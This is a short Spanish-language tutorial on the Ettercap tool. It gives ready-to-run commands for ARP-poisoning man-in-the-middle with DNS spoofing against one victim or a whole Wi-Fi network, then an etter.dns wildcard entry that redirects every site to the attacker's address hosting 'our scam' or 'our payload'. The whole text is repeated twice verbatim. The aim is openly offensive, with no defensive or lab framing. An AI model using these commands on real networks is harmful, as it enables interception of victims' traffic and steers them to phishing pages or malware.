es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos (incluso aquellos cifrados, como SSH y HTTPS). También hace posible la inyección de datos en una conexión establecida y filtrado al vuelo aun manteniendo la conexión sincronizada gracias a su poder para establecer un Ataque Man-in-the-middle(Spoofing). Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing.
COMANDOS BASICOS DE ETERCAP POR CONSOLA
Abriendo un terminal y escribiendo las diferentes opciones de ettercap
nosotros usaremos por ejemplo unos de estes dos comandos para hacer el dnsspoof
🚫Este comando es para una ip específica si ya tenemos la ip de la víctima identificada
-ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /(ip victima)/ //
Este comando es para realizar el ataque en toda la red wifi tengan en cuenta que interfaz wifi tienen puede ser wlan0 wlan1.. otra por cable
-ettercap -T -q -P dns_spoof -M arp // // -i wlan0
Este segundo comandos hacen el dnsspoof sobre todas las maquinas de la red
Ademas de eso debemos modificar modificar un archivo que se llama etter.dns, para localizar dicho archivo abrimos un terminal y escribimos locate etter.dns o vamos a la ruta: usr/local/share/ettercap
ahí abrimos el archivo y lo modificamos con el comando nano etter.dns y lo podremos modificar en la consola
Ahora vamos hasta
para modificar las dns tenemos varias opciones pero yo me voy a centrar en las dos principales.
1. que todas las paginas web sean redirigidas a la que nosotros le mandemos, para eso tenemos que borrar todo lo que tenga la parte donde pone "microsoft sucks" y poner esto:
* A 192.168.1.120
Aquí ponemos a la ip nuestra en donde está corriendo nuestro scam o donde este alojado nuestro payload
Así cada vez que abra el navegador lo redirigira a donde queremos....
COMANDOS BASICOS DE ETERCAP POR CONSOLA
Abriendo un terminal y escribiendo las diferentes opciones de ettercap
nosotros usaremos por ejemplo unos de estes dos comandos para hacer el dnsspoof
🚫Este comando es para una ip específica si ya tenemos la ip de la víctima identificada
-ettercap -T -q -i wlan0 -P dns_spoof -M arp:remote /(ip victima)/ //
Este comando es para realizar el ataque en toda la red wifi tengan en cuenta que interfaz wifi tienen puede ser wlan0 wlan1.. otra por cable
-ettercap -T -q -P dns_spoof -M arp // // -i wlan0
Este segundo comandos hacen el dnsspoof sobre todas las maquinas de la red
Ademas de eso debemos modificar modificar un archivo que se llama etter.dns, para localizar dicho archivo abrimos un terminal y escribimos locate etter.dns o vamos a la ruta: usr/local/share/ettercap
ahí abrimos el archivo y lo modificamos con el comando nano etter.dns y lo podremos modificar en la consola
Ahora vamos hasta
para modificar las dns tenemos varias opciones pero yo me voy a centrar en las dos principales.
1. que todas las paginas web sean redirigidas a la que nosotros le mandemos, para eso tenemos que borrar todo lo que tenga la parte donde pone "microsoft sucks" y poner esto:
* A 192.168.1.120
Aquí ponemos a la ip nuestra en donde está corriendo nuestro scam o donde este alojado nuestro payload
Así cada vez que abra el navegador lo redirigira a donde queremos....
